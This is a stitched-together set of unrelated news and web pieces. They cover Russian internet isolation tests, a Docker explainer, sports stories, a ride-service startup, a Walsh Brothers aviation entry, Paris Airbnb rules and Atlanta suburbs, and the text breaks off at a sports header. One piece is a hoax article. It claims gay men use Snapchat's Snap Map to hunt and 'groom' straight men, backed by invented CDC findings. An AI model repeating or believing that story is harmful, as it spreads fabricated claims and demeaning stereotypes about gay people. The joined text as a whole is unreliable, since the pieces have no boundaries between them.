Andrei Semerikov , general director of a Russian service provider called Er Telecom , said Russia 's ministry of communications and Roskomnadzor , the national internet regulator , ordered communications hubs run by the main Russian internet providers to block traffic to foreign communications channels by using a traffic control system called DPI .
The objective was to see whether the Runet – the informal name for the Russian internet – could continue to function in isolation from the global internet .
The experiment , which took place in spring this year , failed because thousands of smaller service providers , which Roskomnadzor has little control over , continued to pass information out of the country , Mr Semerikov said .
Smaller providers account for over 50 per cent of the market in some Russian regions , generally lack the DPI technology used by the larger companies to implement the blocking orders , and often use satellite connections that can not be easily blocked .
Russian officials denied any such experiment had taken place . A Roskomnadzor spokesman said “ there was not such experiment '' . The agency had not responded to a written request for further details by close of business Thursday .
Mr Semerikov 's comments had been wrongly interpreted and “ in such a form that it is pointless to comment on it , ” another Roskomnadzor spokesman told RBK , a Russian newspaper .
But the reported Spring experiment follows a similar test in July last year , when security agencies including the FSB , the defence ministry , and the interior ministry collaborated with the national telephone operator to see if a national intranet made up of the domain names ending in .ru or . рф could continue to operate if cut off from other parts of the Internet .
That test was reportedly ordered personally by Vladimir Putin , the Russian president , to assess the Russian internet 's ability to continue operating if Western countries introduce sanctions cutting off the country from the internet , and resulted in a decision to build backup infrastructure to ensure the Runet 's continued operation .
Photo : Getty Images
Sanctions that prevent Western companies from doing business in Crimea , the province of Ukraine annexed by Russia in 2014 , have made some internet services unavailable there .
Andrei Soldatov , an expert on Russia 's security services and the co-author of a new book about the Kremlin 's internet security policy and eavesdropping practices , called that a “ pretext '' .
In reality , said Mr Soldatov , officials are readying for the possibility of shutting down the information flow to and from the outside world in case of a domestic political emergency .
“ This is actually just one of a series of such experiments , and it gives us a very good idea of what they have in mind . If you look at the doctrine of information security , it is all about the same thing : the fear of Western countries using the internet as an instrument of influence in Russia and so on , ” he said .
Mr Soldatov said the failure of the spring experiment proved that the authorities were unlikely to succeed in imposing such an information blackout .
“ You technically ca n't impose a Chinese model of censorship on an internet system which , like Russia 's , has grown for 20 years as an almost entirely uncontrolled , free space , ” he said .
Russia has introduced a number of restrictive internet laws in recent years , in what some have described as an effort to impose “ digital sovereignty ” on cyberspace .
Legislation to date includes blacklisting of websites deemed “ extremist ” or harmful to children , making bloggers with more than 3,000 daily readers subject to the same restrictions and regulation as newspapers and television , and requiring internet companies to move all servers containing data on Russia citizens to Russia .
Critics said the extremism and child protection laws are so loosely worded they can be applied arbitrarily . Sites banned under the extremism law include the website of Gary Kasparov , the chess champion and Kremlin critic , grani.ru , an opposition news website , and the blog of Alexey Navalny , an anti-corruption campaigner and vociferous critic of Mr Putin .
Software is anything but simple . Even seemingly basic applications might have a rat 's nest of dependencies , with scores of packages , libraries , and other software components required for them to run . When you try to run multiple applications in the same operating system environment , you might well find that some of these components do n't get along . And when you try to keep those software stacks up-to-date , or change them to keep up with business needs , you bring in all kinds of maintenance headaches .
For many years now , the leading way to isolate and organize applications and their dependencies has been to place each application in its own virtual machine . Virtual machines make it possible to run multiple applications on the same physical hardware while keeping conflicts among software components and competition for hardware resources to a minimum . But virtual machines are bulky—typically gigabytes in size . They do n't really solve problems like portability , software updates , or continuous integration and continuous delivery .
Enter Docker containers . Containers make it possible to isolate applications into small , lightweight execution environments that share the operating system kernel . Typically measured in megabytes , containers use far fewer resources than virtual machines and start up almost immediately . They can be packed far more densely on the same hardware and spun up and down en masse with far less effort and overhead .
Thus containers provide a highly efficient and highly granular mechanism for combining software components into the kinds of application and service stacks needed in a modern enterprise , and for keeping those software components updated and maintained .
Docker container basics
Docker containers are the most modern incarnation of an idea that has been in Unix operating systems such as BSD and Solaris for decades—the idea that a given process can be run with some degree of isolation from the rest of the operating environment .
Virtual machines provide isolation by devoting an entire operating system instance to each application that needs compartmentalizing . This approach provides almost total isolation , but at the cost of significant overhead . Each guest operating instance eats up memory and processing power that could be better devoted to apps themselves .
Containers take a different approach . Each application and its dependencies use a partitioned segment of the operating system 's resources . The container runtime ( Docker , most often ) sets up and tears down the containers by drawing on the low-level container services provided by the host operating system .
To understand Linux containers , for example , we have to start with cgroups and namespaces , the Linux kernel features that create the walls between containers and other processes running on the host . Linux namespaces , originally developed by IBM , wrap a set of system resources and present them to a process to make it look like they are dedicated to that process .
Linux cgroups , originally developed by Google , govern the isolation and usage of system resources , such as CPU and memory , for a group of processes . For example , if you have an application that takes up a lot of CPU cycles and memory , such as a scientific computing application , you can put the application in a cgroup to limit its CPU and memory usage .
Namespaces deal with resource isolation for a single process , while cgroups manage resources for a group of processes . Together , cgroups and namespaces were used to create a container technology called , appropriately enough , Linux Containers , or LXC .
Docker How the virtualization and container infrastructure stacks up .
How Docker changed containers
The original Linux container technology , LXC is a Linux operating system level virtualization method for running multiple isolated Linux systems on a single host . Namespaces and cgroups make LXC possible .
Containers decouple applications from operating systems , which means that users can have a clean and minimal Linux operating system and run everything else in one or more isolated container .
Also , because the operating system is abstracted away from containers , you can move a container across any Linux server that supports the container runtime environment .
Docker introduced several significant changes to LXC that make containers more portable and flexible to use . Using Docker containers , you can deploy , replicate , move , and back up a workload even more quickly and easily than you can do so using virtual machines . Docker brings cloudlike flexibility to any infrastructure capable of running containers .
Docker also provides a way to create container images—specifications for which software components a given container would run and how . Docker 's container image tools allow a developer to build libraries of images , compose images together into new images , and launch the apps in them on local or remote infrastructure .
Docker also makes it easier to coordinate behaviors between containers , and thus build application stacks by hitching containers together . More advanced versions of these behaviors—what 's called container orchestration—are offered by third-party products , such as Kubernetes . But Docker provides the basics .
By taking the LXC concept and building an API and ecosystem around it , the developers of Docker have made working with containers far more accessible to developers and far more useful to enterprises .
Finally , although Docker was originally built atop LXC , eventually the Docker team created its own runtime , called libcontainer . Libcontainer not only provides a richer layer of services for containers , but also makes it easier for the Docker team to develop Docker container technology separately from Linux .
Today , Docker is a Linux or Windows utility that can efficiently create , ship , and run containers .
Docker advantages
Docker containers provide a way to build enterprise and line-of-business applications that are easier to assemble , maintain , and move around than their conventional counterparts .
Docker containers enable isolation and throttling
Docker containers keep apps isolated not only from each other , but from the underlying system . This not only makes for a cleaner software stack , but makes it easier to dictate how a given containerized application uses system resources—CPU , GPU , memory , I/O , networking , and so on . It also makes it easier to ensure that data and code are kept separate . ( See “ Docker containers are stateless and immutable , ” below . )
Docker containers enable portability
A Docker container runs on any machine that supports the container 's runtime environment . Applications do n't have to be tied to the host operating system , so both the application environment and the underlying operating environment can be kept clean and minimal .
For instance , a MySQL for Linux container will run on most any Linux system that supports containers . All of the dependencies for the app are typically delivered in the same container .
Container-based apps can be moved easily from on-prem systems to cloud environments or from developers ' laptops to servers , as long as the target system supports Docker and any of the third-party tools that might be in use with it , such as Kubernetes ( see “ Docker containers ease orchestration and scaling ” , below ) .
Normally , Docker container images must be built for a specific platform . A Windows container , for instance , will not run on Linux and vice versa . Previously , one way around this limitation was to launch a virtual machine that ran an instance of the needed operating system , and run the container in the virtual machine .
However , the Docker team has since devised a more elegant solution , called manifests , which allow images for multiple operating systems to be packed side-by-side in the same image . Manifests are still considered experimental , but they hint at how containers might become a cross-platform application solution as well as a cross-environment one .
Docker containers enable composability
Most business applications consist of several separate components organized into a stack—a web server , a database , an in-memory cache . Containers make it possible to compose these pieces into a functional unit with easily changeable parts . Each piece is provided by a different container and can be maintained , updated , swapped out , and modified independently of the others .
This is essentially the microservices model of application design . By dividing application functionality into separate , self-contained services , the microservices model offers an antidote to slow traditional development processes and inflexible monolithic apps . Lightweight and portable containers make it easier to build and maintain microservices-based applications .
Docker containers ease orchestration and scaling
Because containers are lightweight and impose little overhead , it 's possible to launch many more of them on a given system . But containers can also be used to scale an application across clusters of systems , and to ramp services up or down to meet spikes in demand or to conserve resources .
The most enterprise-grade versions of the tools for deployment , managing , and scaling containers are provided by way of third-party projects . Chief among them is Google 's Kubernetes , a system for automating how containers are deployed and scaled , but also how they 're connected together , load-balanced , and managed . Kubernetes also provides ways to create and re-use multi-container application definitions or “ Helm charts , ” so that complex app stacks can be built and managed on demand .
Docker also includes its own built-in orchestration system , swarm mode , which is still used for cases that are less demanding . That said , Kubernetes has become something of the default choice ; in fact , Kubernetes is bundled with Docker Enterprise Edition .
Docker caveats
Containers solve a great many problems , but they are n't cure-alls . Some of their shortcomings are by design ; some are by-products of their nature .
Docker containers are not virtual machines
The most common conceptual mistake people make with containers is to equate them with virtual machines . However , because containers and virtual machines use different isolation mechanisms , they have distinctly different advantages and disadvantages .
Virtual machines provide a high degree of isolation for processes , since they run in their own instance of an operating system . That operating system does n't have to be the same as the one run on the host , either . A Windows virtual machine can run on a Linux hypervisor and vice versa .
Containers , by contrast , use controlled portions of the host operating system 's resources ; many applications share the same OS kernel , in a highly managed way . As a result , containerized apps are n't as thoroughly isolated as virtual machines , but they provide enough isolation for the vast majority of workloads .
Microsoft offers two types of containers on Windows that blur the lines slightly between containers and virtual machines :
Windows Server Containers are essentially Docker-style containers on Windows . Microsoft essentially provided the Windows kernel with some of the same mechanisms used in Linux to perform the isolation , so Docker containers could have the same behaviors on both platforms .
are essentially Docker-style containers on Windows . Microsoft essentially provided the Windows kernel with some of the same mechanisms used in Linux to perform the isolation , so Docker containers could have the same behaviors on both platforms . Hyper-V Containers are containers that run in their own virtual machine with their own kernel for additional isolation . Thus Hyper-V Containers can run different versions of the Windows kernel if needed . Conventional containers can be converted to Hyper-V Containers if the need arises .
Keep in mind that , while Hyper-V Containers run on the Hyper-V hypervisor and take advantage of Hyper-V isolation , they are still a different animal than full-blown virtual machines .
Docker containers do n't provide bare-metal speed
Containers do n't have nearly the overhead of virtual machines , but their performance impact is still measureable . If you have a workload that requires bare-metal speed , a container might be able to get you close enough—much closer than a VM—but you 're still going to see some overhead .
Docker containers are stateless and immutable
Containers boot and run from an image that describes their contents . That image is immutable by default—once created , it does n't change .
Consequently , containers do n't have persistency . If you start a container instance , then kill it and restart it , the new container instance wo n't have any of the stateful information associated with the old one .
This is another way containers differ from virtual machines . A virtual machine has persistency across sessions by default , because it has its own file system . With a container , the only thing that persists is the image used to boot the software that runs in the container ; the only way to change that is to create a new , revised container image .
On the plus side , the statelessness of containers makes the contents of containers more consistent , and easier to compose predictably into application stacks . It also forces developers to keep application data separate from application code .
If you want a container to have any kind of persistent state , you need to place that state somewhere else . That could be a database or a stand-alone data volume connected to the container at boot time .
Docker containers are not microservices
I mentioned earlier how containers lend themselves to creating microservices applications . That does n't mean taking a given application and sticking it into a container will automatically create a microservice . A microservices application must be built according to a microservice design pattern , whether it is deployed in containers or not . It is possible to containerize an application as part of the process of converting it to a microservice , but that 's only one step among many .
When virtual machines came along , they made it possible to decouple applications from the systems they ran on . Docker containers take that idea several steps further—not just by being more lightweight , more portable , and faster to spin up than virtual machines , but also by offering scaling , composition , and management features that virtual machines ca n't .
By Captain Pyke | February 19 , 2010 - 10:46 pm
Our favorite bearded first officer is busting out his bull horn again and is directing a brand-new episode of the scifi series `` V '' . Frakes , who has become quite the director over the years , is set to direct episode 1.06 of the series . The episode is actually in production as we speak . Starting Tuesday the 16th and scheduled to conclude on the 25th , the episode introduces a new character named John May .
Frakes is known for directing several episodes of TNG and even directing the most successful Next Gen movies , `` First Contact '' . He 's also made quite a career directing other television series including ; `` NCIS '' , `` Castle '' , `` Dollhouse '' , `` Leverage '' ( with Star Trek alum Jeri Ryan ) , and `` Roswell '' . Just to name a few .
Now , we have n't watched the rebooted `` V '' , but we hear it 's pretty good . For us though , there 's just not enough Mark Singer .
Be sure to check out the episode when it airs , Tuesday April 6th , 2010 , on ABC .
( info Source V Files )
NFL fan Todd Sutton is n't going to pester Green Bay Packers quarterback Aaron Rodgers to make good on the $ 4.5 million bet Rodgers lost after defending his friend Ryan Braun . After all , a full year 's salary for one of the NFL 's premier quarterbacks is a little excessive , right ?
“ I 'd just take a game check , ” Sutton told USA TODAY Sports on Tuesday , laughing .
That would only cost Rodgers $ 281,250 . After receiving a new $ 66 million contract in April , Rodgers certainly has the cash to pay up .
“ I 'm not really expecting to hear from him . It 'd be cool , but I doubt it 's going to happen , ” Sutton said .
It all started in February 2012 , when Sutton , a 37-year-old flight nurse from Denver , sent Rodgers a tweet in which Sutton called the quarterback “ delusional ” for the way he defended Braun against allegations of performance enhancing drugs . The tweet garnered a little attention at the time , but nothing like what happened since Braun accepted a suspension from Major League Baseball on Monday afternoon . @ toddsutton ya I 'd put my salary next year on it . # ponyup # exonerated — Aaron Rodgers ( @ AaronRodgers12 ) February 23 , 2012 “ Apparently Twitter does n't forget , ” Sutton said .
Sutton went from “ about 15 ” Twitter followers on Monday to more than 550 by lunchtime on Tuesday and saw his exchange with Rodgers cited in major media outlets and splashed across the screen on ESPN .
A review of Sutton 's Twitter account reveals he 's hardly a troll . He would send messages to Denver-area sports journalists from time to time but rarely tries to interact with athletes . His 2012 message to Rodgers was the first he ever sent to the Packers ' quarterback , and he was n't expecting a response .
Sutton still likes Rodgers , even though he thought Rodgers ' response to him was “ arrogant. ” In it , Rodgers taunted Sutton to “ pony up ” and predicted that Braun would be “ exonerated . ”
“ He was probably trying to embarrass me on Twitter , but it has kind of reversed now , ” Sutton said .
I bet you did n't expect to see that name in a headline again . Well think again , because “ The Dominator ” wants to return to the National Hockey League . The man who apparently never ages ( he 's supposedly 47 years old ! ) has decided , after taking a year off , that he wants to play again . Let me rephrase that…after taking a year off hockey . But did he partake in activities that normal retired people do ? Heck no . NHL.com 's Michael Langr noted that Hasek has kept himself busy by : cycling , skiing ( in the Alps as well ) , spinning , soccer , volleyball , biking ( pedaling across Albania ) , and even race car driving with the pro 's in Spain ! At 47 ! Just reading what I just wrote makes me have to stop for a breath . It also makes you question if he 's even human . He 's certainly not a normal retiree that 's for sure . Let 's first backtrack to Hasek 's early days .
He was drafted way back in 1983 by the Chicago Blackhawks at , wait for it…199th overall ! There are only 181 total picks in the draft now . So if the NHL had the same draft format in 1983 , Hasek would 've been passed over . Whoever was responsible for drafting him should be arrested for stealing…one of the greatest goaltenders to ever play the game , and the GM at the time , Mike Keenan ( you might 've heard of the guy ) should also get arrested for choosing to keep Jimmy Waite instead of Hasek . Waite ended up playing a combined 90 games through the next 6 seasons before spending the rest of his career in the minors and overseas . I sometimes wonder if Mike Keenan and Mike Milbury ever go to the bar and just cry into their beers . Milbury is known for trading Roberto Luongo and Olli Jokinen to the Florida Panthers in return for Mark Parrish and Oleg Kvasha . He instead opted to go with rookie Rick “ The Human Cast ” DiPietro . I wonder how that worked out for the Isles in the long-run .
His next stop was in Buffalo . From 1992-2001 Hasek was outstanding . In his time there he racked up enough trophies that would likely fill all the shelves in his house . He was crowned the NHL MVP by winning the Hart Trophy in 1997 and 1998 ( nominated in 1994 , 1995 , and 1999 ) . He won the Lester B. Pearson Award ( now called the Ted Lindsay Award ) for being the most outstanding player in the regular season also in 1997 and 1998 ( nominated in 1999 , he almost had a Pearson Award hat trick ! ) . He proved he was the best goalie in the league 6 times ( 1994 , 1995 , 1997 , 1998 , 1999 , and 2001 ) . He allowed the fewest goals in the league in 1994 and 2001 , claiming the Jennings Trophy . He was an All-Star in 1996 , 1997 , 1998 , 1999 , and 2000 . And he was also named to the NHL First All-Star Team in 1994 , 1995 , 1997 , 1998 , 1999 , and 2001 . Is that enough self-accomplishment for one player or what ? Except the one thing he lacked was Lord Stanley 's long-alluded Cup . It was n't until Red Wings GM Ken Holland traded Slava Kozlov and a draft pick for The Dominator .
Upon his arrival in Detroit , Hasek won a career high 41 games . In that year , he finally won the Stanley Cup . All was right . It was a true storybook ending to Hasek 's career , riding off into the sunset with the Stanley Cup . Wrong . He did take a year off , but returned to the Wings for the 2003-04 season . Welcome back Dom . He went 8-3-2 that year while backing up Cujo and while battling a groin injury . He went through another “ retirement ” phase , before returning for the 2005-06 season with the Ottawa Senators . That proved not to be a good fit for him , and the Senators let him go after the season . Enter Detroit again . In 2006 , he returned to Hockeytown for what seemed like his last year . He signed a non-committal one-year contract for the season . But after going 38-11-6 he proved he still had plenty of gas left in the tank , and he resigned again , this time again for one year . He even took a hometown discount to stay with the Red Wings . When the 07-08 season began , Chris Osgood was back playing on a normal basis , and Hasek and “ Ozzie ” split time pretty much 50/50 . This proved to be a lethal combination , as Detroit won the President 's Trophy , and later the Stanley Cup .
Ok , Hasek , try that whole “ riding off into the sunset ” thing again , and this time , you have the satisfaction of 2 Cup rings . Nope . He did take a year off , but the year after , the Dominator resumed his career , but in Europe , playing for HC ( Hockey Club ) Pardubice of the Czech Extraliga . At the age of 44 , he finished the season with a record of 24-12 ( 2.24 GAA ) . His most recent stop was in the Kontinental Hockey League ( spelled with a “ K ” because there are numerous other CHL 's ) in Russia , which was really growing in popularity . His stint in HC Spartak Moscow was a bit of a struggle for Dominik , although he did finish with a winning record of 23-18-3 ( with a GAA of 2.45 and a SP of .915 , and including a league-leading 7 shutouts ) . The mediocre record was more of a team effort however . According to hockeydb.com Spartak Moscow only managed to score 129 goals ( the least amount of goals scored in their division , and 3rd least in the league ) .
But after the long list of accomplishments I mentioned earlier , Hasek has told his agent , Ritch Winter , that he wants to play once again . But not just anywhere . He has reportedly turned down offers in the Czech and Russian leagues , with his sole intent being , a comeback to the NHL . There were three teams reportedly in the mix for the legendary goalie , including the Detroit Red Wings , the Buffalo Sabres , and the Tampa Bay Lightning . The Bolts tried going with Dwayne Roloson , but after last season 's horrendous 13-16-3 record with a staggering 3.66 GAA and .886 SP , my expectation would be for Roloson to retire this offseason . Last year 's backup , Mathieu Garon is signed for next season , and Steve Yzerman just sent two of their 2nd round picks in this year 's draft along with a 3rd round pick in next year 's draft for Anders “ The Giant ” Lindback . I 'll take full credit for that nickname . You 're welcome NHL.com . He 's 6 feet 6 inches tall , and has played in Pekka Rinne 's shadow in Nashville . I expect Lindback to be a good fit for Tampa Bay , especially in the long run since he 's only 24 . With Lindback and Garon now , you can cross the Lightning off the list . There is no way that Buffalo can make that many moves this summer . They already have the 5th least cap space in the league according to CapGeek.com , and they only have 19 players under contract so far . To add to that , franchise goalie and US Olympian Ryan Miller still has 2 more years left , and Jhonas Enroth proved to be a very reliable ( and cheap , only $ 675,000 of cap space ) . His record of 8-11-4 does n't appear to be reliable , but when you see that his GAA is 2.70 and his SP is .917 , you can clearly deduce that the lack of offense is the main problem in Buffalo . They should look to make some changes in the forward positions first .
That only leaves the Detroit Red Wings as the sole destination for Hasek 's return . The Wings have had problems in the position of backup goaltender for a long time . Clearly Ty Conklin was not the man for the job , and face it Wings fans , neither is Joey MacDonald . His 7 game winning streak , extending the Wings ' record for the most home wins in a row in NHL history was very impressive , but after the streak ended at 23 wins , “ Big Mac ” went 1-4 with a save percentage of .865 . Conklin will be a UFA come July 1st , and he could very well retire as well . MacDonald is under contract for next season , but it 's a 2-way contract , so he could easily be playing in Grand Rapids next year .
Enter Dominator . I have no doubt in my mind that Hasek is in better physical condition than most of the players in the league . He is also one of the most dedicated and hardworking players ever to play the game . His son actually attends Michigan State University , which is yet another draw for him to return to Hockeytown . He 'll likely want a one-year deal , and I think he would be able to start a good 30-35 games next season . Feel free to doubt me , but if there 's one thing that Dominik Hasek is known to do , it 's proving his critics wrong , time and time again . Detroit would be happy to welcome him back , and if history repeats itself AGAIN , do n't be surprised to see Hasek riding off into the sunset wearing his 3rd Cup ring .
Expect to hear more news from Hasek and his agent possibly sometime this week , maybe on draft day , or another day leading to July 1st .
Thanks for reading . Follow me on Twitter @ yungspork .
HopSkipDrive founders Carolyn Yashari Becher , Joanna McFarland and Janelle McGlothlin . The company just landed $ 3.9 million in seed funding . ( Photo11 : Jeff Bender for HopSkipDrive )
SAN FRANCISCO — With Uber all the rage among ride-hailing adults , it 's little wonder that companies aiming for a more specific rider — children — are gaining momentum and backing .
On Tuesday , Los Angeles-based HopSkipDrive announced a $ 3.9 million seed round , according to a statement from the company . The round was led by Upfront Ventures with participation from FirstMark Capital , Maveron and BBG Ventures .
The funding will be used to scale the startup , which was founded by three time-crunched mothers with eight children between them .
`` We created HopSkipDrive to solve the problem we each faced getting our own kids to school and activities , '' Joanna McFarland , co-founder and CEO , said in a statement . McFarland has a background in product management , while Chief Operating Officer Carolyn Yashari Becher was a non-profit lawyer and Chief Marketing Officer Janelle McGlothlin runs branding firm Writebrand Inc .
Upfront Ventures partner Greg Bettinelli added : `` General ride-sharing solutions do n't meet the needs of this unique market ( with its ) pre-arranged rides , strong focus on safety , and specialized logistics not required for adult riders . We see a real growth opportunity with this differentiated approach . ''
In contrast to on-demand services such as Uber and Lyft , HopSkipDrive and Shuddle allow parents to book rides well in advance . Apps give details on the drivers coming to collect children , and show the car in motion while it 's in progress . Most drivers are women with extensive child care experience .
Launched in March , HopSkipDrive now has more than 100 contracted drivers , all of whom go through a robust vetting process that includes interviews , vehicle-safety inspections and background checks that include TrustLine , a fingerprint-anchored scan for arrests that the California Public Utilities Commission requires of services that work with children .
HopSkipDrive 's more established Northern California rival , Shuddle ( which has raised some $ 12 million since launching last fall ) , recently began running its contracted drivers through TrustLine . Shuddle CEO Nick Allen agreed to the process after the CPUC issued Shuddle a cease-and-desist order . But Allen maintains that Shuddle 's driver-vetting process is more thorough than what state officials mandate and is hoping CPUC officials eventually change their standards .
`` We 're not concerned about what other companies are doing , '' McFarland told USA TODAY recently . `` We consider TrustLine the gold standard and that 's why we use it . ''
Follow me on Twitter : @ marcodellacava
Read or Share this story : http : //usat.ly/1IXTl10
26.7k SHARES
Moles within the gays community confirm that gays have used their technological prowess to exploit Snapchat 's new Snap Map feature to hunt down straight men and groom them into homosexuality .
Earlier in the week , reports arose nationwide that straight fathers taking innocent morning strolls or late night jaunts to the supermarket were making up missing , only to be found hours later exhausted and with spent sweat , the ‘ look of homosexuality ' raging within their eyes .
Scientists from the CDC found that their symptoms were consistent with homosexuality , though their families insisted that they previously showed no sort of interest in the lifestyle . Researchers found that the only thing all the men had in common is their smartphones contained the Snapchat app .
The Christian Defense League of Texas reports that as of Friday , over 6,586 have had their location ‘ snap mapped ' by gays on the prowl , some traveling as far as California or New York to the Bible Belt to “ get a taste of American beefcake . ”
Throughout the past decade , gays have been able to apply their mastery of computers to reconfigure many applications to secretly serve their agenda . To date , the most nefarious and well-known plot of the gay community took place when they were able to groom men on Christian Mingle into thinking they were building a relationship with a woman , when it was already too late with emotional involvement that they found they were attracted to a gay man playing ‘ catfish ' on the other end of the internet connection .
Researchers with CDL of Texas warn the Christian Mingle disaster is nowhere near the scope as the Snapchat tool , which could potentially leave millions of unsuspecting straight men prone and vulnerable to getting raunchy photos of toned backsides and seductive lips , getting all hot and heavy by the random images entering their phone , only to find out that it was images of a gay men hiding in the bushes or behind some shopping carts all along .
Gays are randomly browsing Bitmojis to find avatars that look like good , wholesome Christian fathers who are in a heterosexual relationship . They are traveling as far as New York , California and even France once they find ‘ the right guy ' . They are then networking with each other , cornering these vulnerable straight men as they continue on their day , not knowing they are prey to a seductive predator who will shamelessly snapchat pictures of his glistening abs , perfectly chisled buttocks and lean , toned thighs to make a bored straight dad think he 's being hit on by a hot co-ed , when in reality it is a group of gays closing in to get an inevitable taste of foreign DNA .
The Christian Defense League of Texas is warning straight men to turn off the location feature on their phones and to use the buddy system , checking in with a friend or colleague every hour or so in case they are the target of a gay sting .
Alert Level : Severe , Take Caution
Walsh Brothers Flying Boats Walsh Brothers type D flying boat Role Flying boats National origin New Zealand Manufacturer Walsh Brothers
The Walsh Brothers Flying Boats were aircraft that were used during World War I to provide training to pilots in New Zealand prior to their enlistment into the Royal Flying Corps .
Walsh brothers [ edit ]
Brothers Leo and Vivian Walsh built a Howard Wright biplane in 1910 and flew it on 5 February 1911 . In August 1911 , the aircraft crashed but it was later rebuilt by the brothers and converted into an entirely new aircraft , with a streamlined nacelle positioned between the wings , which had a swept outer bay , while the canard was replaced by a conventional tailplane . [ citation needed ]
The New Zealand Flying School [ edit ]
During 1914 the Walsh brothers constructed a two-seat flying boat similar to a Curtiss design . The war broke out in August 1914 , and the Curtiss-based design was modified with dual controls to become a trainer and first flown on 1 January 1915 . In October 1915 , the brothers founded the New Zealand Flying School to train men for the Royal Flying Corps . The first class of three included the fighter ace , Keith Caldwell . Classes were always small but , in contrast to overseas training , comprehensive . [ citation needed ]
Evolution of the Curtiss design [ edit ]
Due to the difficulties in obtaining suitable training aircraft , the Walsh brothers decided to build their own trainers , initially based on the Curtiss pattern . Over the next four years they produced a series of four flying boat designs , evolved from , but bearing little resemblance to , the original Curtiss model . The last of the Walsh Brothers designs , the Type D of 1919 , was an aerodynamically and hydrodynamically advanced machine , with a powerful Beardmore engine . [ citation needed ]
Sale to NZPAF [ edit ]
The flying school struggled to gain clients after the war , and all assets of the flying school were acquired for the New Zealand Permanent Air Force ( NZPAF ) in 1924 . All Walsh brothers flying boats had been made for the use of the school , not for sale , and were transferred to the NZPAF ; however , the NZPAF had a landplane training programme based upon the Avro 504K and had no use for the flying boats . The survivors are believed to have been burnt on the Auckland waterfront , however there are `` lost treasure '' stories that these and some of the other machines used by the flying school are stored on a defence force base at Devonport in tunnels bricked up after the Second World War . [ citation needed ]
Paris officials have been accused of encouraging the city 's inhabitants to denounce neighbours who illegally rent out their properties on platforms such as Airbnb through a new website launched Tuesday .
ADVERTISING Read more
The opendata.paris.fr website , set up by the Paris mayor 's office , allows those who sublet their homes – and have obtained the proper authorisation to do so – to register their address . These addresses are then displayed in both list and map form on the website for anyone to access .
Members of the public who know someone rents out a property can then check to see if they have the proper legal permission .
Under the city 's laws , anyone who wants to rent out a residential property for more than four months – or rent out a property that is n't their primary residence – must apply for a change of use permit and register it as a commercial property .
Those who do n't could face a €25,000 fine .
The website has caused quite a stir online and in the media , with many interpreting it as a way to encourage Parisians to inform the authorities if they suspect a neighbour is not playing by the rules .
“ Airbnb : Paris City Hall opens the door to informants ” said French daily Le Figaro . “ Denunciation brought up to date , ” tweeted Jean-Baptiste Marteau , a journalist for the France 2 television channel .
Many took to the comments forum of opendata.paris.fr to express their displeasure . Amid the comments likening Paris Mayor Anne Hidalgo to a fascist and member of the Gestapo , some took a more sarcastic tone .
“ Great , now we can denounce all our neighbours who we do n't like ! ” said one .
“ My neighbour is German , ” said another . “ When are the authorities coming to deport him ? ”
Informing on neighbours not the goal , says Paris
Paris would not be the first city to launch such an initiative . Earlier this month , officials in the German capital Berlin called on residents to anonymously report anyone flouts new housing rules designed to restrict private property rentals through Airbnb and similar online platforms .
However , Paris City Hall has denied that the purpose of the website is to encourage people to inform on each other , but merely to “ put pressure ” on those breaking the law .
“ It 's not a site for denouncing your neighbour , ” said Mathias Vicherat , the mayor 's chief of staff , in an interview with Europe1 radio .
“ We hope that it provokes a sort of shock of civic consciousness and that people will begin to follow the rules on their own without waiting to be reported by their neighbours , ” he added .
At more than 40,000 , Paris has more Airbnb hosts than any other city , the property rental website said last year . But the relationship between the San Francisco-based company and the French capital has often been fraught .
Amid fears over rising house prices and a shortage of affordable housing , Paris officials have been cracking down on people who rent out properties illegally , conducting raids on homes in some of the capital 's most popular tourist districts .
Meanwhile , Airbnb agreed last year to start collecting tourists taxes from its customers on behalf of Paris after a complaint of unfair competition by hotel owners .
Has the paradigm shifted for good when Atlanta 's sprawling suburbs not only want to visit the city again — but become like the city , in certain respects ?
Maybe so . For better or worse .
Cities around the world have been watching the Beltline for years as a guinea-pig example of ambitious urban redevelopment . ( Chicago , which is gussying up its riverfront , is the latest example this week ) .
But now , closer to home , Atlanta 's outlying communities seem to be looking inwardly ( as in ITP ) for inspiration more often as they aim to reinvent themselves in the age of millennials .
The latest and perhaps most blatant example comes from Snellville , whose leaders hope to capitalize on a commercial boom to create their very own city-market complex like Krog Street Market for an eight-acre parcel near the Gwinnett city 's core , the AJC reports .
One city official says the mix of pedestrian space , bistros , and retail would aim to capture “ the next generation ” in the pipeline .
On the flipside of the metro , Fayetteville leaders are looking to borrow from the Atlanta Beltline template to connect and enhance the city 's walking paths — and possibly reinvigorate the area around Old Courthouse Square , as Fayette News reported last week .
For some outlying cities , resemblance to thriving urban centers ( or lack thereof ) like Atlanta can be of major consequence .
Census data show that Fayette County lost 31 percent of its millennial population between 2007 and 2014 , which RealtyTrac called the nation 's highest rate of decline . Those figures spurred county leaders to gather for a summit earlier this year and brainstorm about how to stem the millennial bleeding .
More nightlife is imperative , they concluded . Along with smaller rentals .
`` One of the things we 're hearing is [ millennials ] like one-bedroom apartments , ” Peachtree City Mayor Vanessa Fleisch told WSB-TV at the time . “ We do n't have any of those . ''
The ATL hath no such problem .
Point was outstanding this past weekend , stopping 75 of 76 shots in two games for the Raiders . On Friday , he made 43 saves for his second shutout in three games as Colgate and Princeton played to a 0-0 tie . The next night Point stopped 32 of 33 shots in a 4-1 win over Quinnipiac .
The fifth-round pick in the 2016 NHL Draft has allowed just nine goals in his first eight games , stopping 246 of 255 shots . He leads the nation with a 1.08 goals against average and .965 save percentage .
Point has allowed just two goals in his past four starts , turning away 115 of 117 shots . But he has just a 2-0-2 record during that stretch because the goal support has n't always been there for him .
`` [ Colton 's ] doing what we expect him to do . You see goalies in the NHL making 35-40 saves per night , and that 's what he 's doing for us right now . We just have to try and find him some offense and support him in that regard , '' Colgate coach Don Vaughan told media after Friday 's game .
Colgate has yet to lose a game in regulation with Point in goal this season .
`` He 's been unbelievable , he 's really special , '' Colgate co-captain Mike Panowyk said of Point after Saturday 's game . `` Every night he gives us a chance to win with big saves and small saves , he 's there all the time , and we have complete trust in him . ''
The 19-year-old Point did n't see a lot of playing time as a freshman in 2016-17 . He was slowed by an illness early in the season and played in only ten games . He was expected to be the No . 1 guy for Colgate this season , and he has n't disappointed .
`` I 've just been doing my thing , '' Point told media after Friday 's shutout . `` I know what it takes for me to be good and make sure I do all of those things . The coaches knew when they recruited me what I was capable of , and I do n't see any reason to let them down . ''
Point Stats : Colgate ( ECAC ) | 4-0-4 | 1.08 | .965
Here 's a look at how other Dallas prospects playing in college , Europe and juniors fared over the past week .
North American Juniors
